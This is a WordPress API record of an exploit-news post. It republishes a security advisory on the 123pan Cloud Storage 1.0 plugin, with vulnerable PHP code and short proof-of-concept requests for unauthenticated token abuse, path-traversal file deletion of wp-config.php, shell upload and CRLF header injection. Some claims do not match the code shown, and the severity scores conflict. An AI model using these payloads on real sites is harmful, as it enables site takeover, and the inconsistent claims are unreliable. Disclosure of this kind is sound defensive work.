{"id":1165,"date":"2025-04-23T06:16:22","date_gmt":"2025-04-23T06:16:22","guid":{"rendered":"http:\/\/localhost\/?p=1165"},"modified":"2025-04-23T06:16:22","modified_gmt":"2025-04-23T06:16:22","slug":"wordpress-123pan-cloud-storage-10-file-deletion-shell-upload-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1165","title":{"rendered":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">PACKETSTORM:190579<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">packetstorm<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-04-21T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">0.0<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #666666; font-weight: bold;\">NONE<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">NONE<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nWordPress 123pan Cloud Storage plugin version 1.0 suffers from token&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br \/>    .:. Exploit Title > WordPress 123pan Cloud Storage Plugin &#8211; Multiple Vulnerabilities<br \/>    .:. Date: April 19, 2025<br \/>    .:. Exploit Author: bRpsd<br \/>    .:. Contact: cy[at]live.no<br \/>    .:. Vendor -> https:\/\/www.123pan.com\/<br \/>    .:. Product -> https:\/\/wordpress.org\/plugins\/123pan\/<br \/>    .:. Tested Version -> 1.0<br \/>    .:. DBMS -> MySQL<br \/>    .:. Tested on > macOS [*nix Darwin Kernel], on local xampp<br \/>    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<\/p>\n<p>    [+] Vulnerability #1: Improper Authentication in Token Handling (CWE-287)<br \/>    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>    &#8211; Risk: High (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:N | 9.1)<br \/>    &#8211; Location: yunpan_get_yp_token() function<br \/>    &#8211; Attack Vector: Remote Unauthenticated<br \/>    &#8211; Impact: Account Takeover, API Credential Theft<\/p>\n<p>    Vulnerable Code:<br \/>    ================================================================================================================<br \/>    function yunpan_get_yp_token($client_id=&#8221;, $client_secret=&#8221;, $save=0) {<br \/>        $stored_token = get_option(&#8216;yunpan_access_token&#8217;);<br \/>        $stored_expiry = get_option(&#8216;yunpan_token_expiry&#8217;);<br \/>        $current_time = current_time(&#8216;timestamp&#8217;);<br \/>        if ($stored_token &#038;&#038; $stored_expiry &#038;&#038; $stored_expiry > $current_time &#038;&#038; !$save) {<br \/>            return $stored_token;<br \/>        }<br \/>        $options = get_option(&#8216;yunpan_settings_storage&#8217;);<br \/>        $client_id = $client_id ? $client_id : $options[&#8216;access_key&#8217;];<br \/>        $client_secret = $client_secret ? $client_secret : $options[&#8216;secret_key&#8217;];<br \/>        $api_url = &#8216;https:\/\/open-api.123pan.com\/api\/v1\/access_token&#8217;;<br \/>        $body = wp_json_encode(array(<br \/>            &#8216;clientID&#8217; => $client_id,<br \/>            &#8216;clientSecret&#8217; => $client_secret,<br \/>        ));<br \/>        $args = array(<br \/>            &#8216;headers&#8217; => array(<br \/>                &#8216;Authorization&#8217; => &#8216;Bearer &#8216; . base64_encode($client_id . &#8216;:&#8217; . $client_secret),<br \/>                &#8216;Content-Type&#8217;  => &#8216;application\/json&#8217;,<br \/>                &#8216;Platform&#8217; => &#8216;open_platform&#8217;<br \/>            ),<br \/>            &#8216;body&#8217; => $body<br \/>        );<br \/>        $response = wp_remote_post($api_url, $args);<br \/>        \/\/ &#8230;<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: The function is accessible via admin-ajax.php without authentication checks (confirmed via hook registration). Attackers can:<\/p>\n<p>    1-Bruteforce credential storage via repeated API calls<br \/>    2-Manipulate client_id\/client_secret through unsecured AJAX endpoints<br \/>    3-Retrieve\/stage Bearer tokens through base64-encoded credentials<\/p>\n<p>    Exploitation [poc]:<br \/>    curl -X POST &#8220;https:\/\/victim-site.com\/wp-admin\/admin-ajax.php&#8221; \\<br \/>      -d &#8220;action=yunpan_get_token&#038;client_id=attacker_id&#038;client_secret=attacker_secret&#8221;<\/p>\n<p>    [+] Vulnerability #2: Unrestricted File Upload (CWE-434)<br \/>    Risk: Critical (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H | 9.3)<br \/>    Location: yunpan_upload_file_to_123pan()<br \/>    Impact: Remote Code Execution, Data Exfiltration<\/p>\n<p>    Vulnerable code:<br \/>    ================================================================================================================<br \/>    function yunpan_upload_file_to_123pan($file_path, $file_type, $url) {<br \/>        $file_contents = yunpan_read_file_content($file_path);<br \/>        if (is_wp_error($file_contents)) {<br \/>            return $file_contents;<br \/>        }<br \/>        $file_size = yunpan_get_file_size($file_path);<br \/>        $args = array(<br \/>            &#8216;method&#8217;    => &#8216;PUT&#8217;,<br \/>            &#8216;headers&#8217;   => array(<br \/>                &#8216;Content-Type&#8217;   => $file_type,<br \/>                &#8216;Content-Length&#8217; => $file_size,<br \/>            ),<br \/>            &#8216;body&#8217;      => $file_contents,<br \/>        );<br \/>        return wp_remote_request($url, $args);<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue:The $file_path parameter is derived from unsanitized user input via media upload forms. Attackers with contributor+ privileges can Upload PHP shells using path traversal (..\/..\/malicious.php),Overwrite core WordPress files via absolute path injection,Stage malicious files in executable directories.<\/p>\n<p>    Exploitation [poc]:<br \/>    1-Identify the input field or API endpoint where the file path is provided.<br \/>    2-Input a path to a malicious file.<br \/>    3-Check if the file is uploaded and executed on the server.<\/p>\n<p>    Second POC:<br \/>    1- Create post with media attachment path &#8220;..\/..\/..\/wp-config.php&#8221;<br \/>    2- Observe sensitive configuration file exfiltration<\/p>\n<p>    [+] Vulnerability #3: Insecure File Deletion (CWE-22)<br \/>    Risk: High (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:N\/I:H\/A:H | 8.6)<br \/>    Location: yunpan_delete_remote_attachment()<br \/>    Impact: Denial of Service, Site Takeover<\/p>\n<p>    Vulnerable code:<br \/>    ================================================================================================================<br \/>    function yunpan_delete_remote_attachment($post_id) {<br \/>        $meta = wp_get_attachment_metadata($post_id);<br \/>        $token = yunpan_get_yp_token();<br \/>        if (!empty($meta[&#8216;file&#8217;])) {<br \/>            $deleteObjects = [];<br \/>            $file_path =  $meta[&#8216;file&#8217;];<br \/>            $deleteObjects[] = $file_path;<br \/>            yunpan_open_request(&#8216;api\/v1\/file\/base-path\/trash&#8217;, [&#8216;filePathList&#8217; => $deleteObjects], $token);<br \/>        }<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: The function deletes files based on metadata that could be manipulated by an attacker. The file paths are not properly validated, this could lead to arbitrary file deletion. An attacker could manipulate metadata to delete critical files, leading to Denial of Service (DoS).Attachment metadata is stored in wp_postmeta which is writable via REST API. Attackers can: Update postmeta via API to reference critical files,Trigger deletion of wp-config.php or .htaccess,Achieve persistent site compromise.<\/p>\n<p>    Exploitation [poc]:<br \/>    PUT \/wp-json\/wp\/v2\/media\/123 HTTP\/1.1<br \/>    {<br \/>        &#8220;meta&#8221;: {<br \/>            &#8220;file&#8221;: &#8220;..\/..\/..\/wp-config.php&#8221;<br \/>        }<br \/>    }<\/p>\n<p>    [+] Vulnerability #4: HTTP Header Injection (CWE-113)<br \/>    Risk: Medium (CVSS:3.1\/AV:N\/AC:H\/PR:L\/UI:N\/S:U\/C:L\/I:L\/A:N | 5.4)<br \/>    Location: yunpan_open_request()<br \/>    Impact: SSRF, Cache Poisoning, Open Redirect<\/p>\n<p>    Vulnerable code:<br \/>    ================================================================================================================<br \/>    function yunpan_open_request($api_path, $data, $token, $method=&#8221;POST&#8221;, $add_header=false) {<br \/>        $api_url = &#8216;https:\/\/open-api.123pan.com\/&#8217;.$api_path;<br \/>        $args = array(<br \/>            &#8216;headers&#8217; => array(<br \/>                &#8216;Authorization&#8217; => &#8216;Bearer &#8216; . $token,<br \/>                &#8216;Content-Type&#8217;  => &#8216;application\/json&#8217;,<br \/>                &#8216;Platform&#8217; => &#8216;open_platform&#8217;,<br \/>            ),<br \/>        );<br \/>        if ($method == &#8216;GET&#8217;) {<br \/>            $api_url = add_query_arg($data, $api_url);<br \/>            $response = wp_remote_get($api_url, $args);<br \/>        } else {<br \/>            if ($data) {<br \/>                $args[&#8216;body&#8217;] = wp_json_encode($data);<br \/>            }<br \/>            $response = wp_remote_post($api_url, $args);<br \/>        }<br \/>        \/\/ &#8230;<br \/>    }<br \/>    ================================================================================================================<br \/>    Issue: The function constructs HTTP headers using user-controlled tokens. These tokens are not properly validated, it could lead to HTTP header injection. An attacker could inject malicious headers to manipulate server responses or conduct phishing attacks. Through chained exploitation (Vuln #1), <br \/>    attackers can control $token to inject:<br \/>    -CRLF sequences for header splitting<br \/>    -Proxy tunneling directives<br \/>    -Redirect headers<\/p>\n<p>    POC:<br \/>    token = &#8220;attacker_token\\r\\nX-Forwarded-For: 127.0.0.1&#8221;<br \/>    requests.post(api_url, headers={&#8216;Authorization&#8217;: f&#8217;Bearer {token}&#8217;})<\/p>\n<p>    Fixes:<br \/>    * Ensure that the client_id and client_secret are validated and sanitized. Implement authentication checks to ensure only authorized users can access this function.<br \/>    * Validate and sanitize file paths before processing. Implement checks to ensure only allowed file types and paths are used.<br \/>    * Validate and sanitize all user-controlled inputs used in HTTP headers. Implement checks to prevent header injection attacks.<br \/>    * Apply WordPress nonce system to all AJAX handlers<br \/>    * Implement strict capability checks (manage_options)<br \/>    * Add audit logging for all API transactions<br \/>    * Use prepared statements for all SQL operations<br \/>    * Conduct third-party security code review<\/p>\n<p>    2025-04-01: Initial discovery<br \/>    2025-04-05: Vendor notification<br \/>    2025-04-12: Follow-up (no response)<br \/>    2025-04-19: Coordinated disclosure\n<\/div>\n<p><a href=\"https:\/\/packetstorm.news\/files\/id\/190579\/\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection Exploit ID PACKETSTORM:190579 Type packetstorm Published 2025-04-21T00:00:00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,34,12,13,33,53,7,11,5],"class_list":["post-1165","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=1165\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection Exploit ID PACKETSTORM:190579 Type packetstorm Published 2025-04-21T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=1165\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-23T06:16:22+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"WordPress 123pan Cloud Storage 1.0 File Deletion \\\/ Shell Upload \\\/ Injection\",\"datePublished\":\"2025-04-23T06:16:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165\"},\"wordCount\":982,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1165#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165\",\"name\":\"WordPress 123pan Cloud Storage 1.0 File Deletion \\\/ Shell Upload \\\/ Injection - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-04-23T06:16:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=1165\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=1165#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"WordPress 123pan Cloud Storage 1.0 File Deletion \\\/ Shell Upload \\\/ Injection\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=1165","og_locale":"en_US","og_type":"article","og_title":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection - zero redgem","og_description":"Exploit Details Basic Information Exploit Title WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection Exploit ID PACKETSTORM:190579 Type packetstorm Published 2025-04-21T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=1165","og_site_name":"zero redgem","article_published_time":"2025-04-23T06:16:22+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=1165#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=1165"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection","datePublished":"2025-04-23T06:16:22+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=1165"},"wordCount":982,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=1165#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=1165","url":"https:\/\/zero.redgem.net\/?p=1165","name":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-04-23T06:16:22+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=1165#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=1165"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=1165#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"WordPress 123pan Cloud Storage 1.0 File Deletion \/ Shell Upload \/ Injection"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1165"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/1165\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}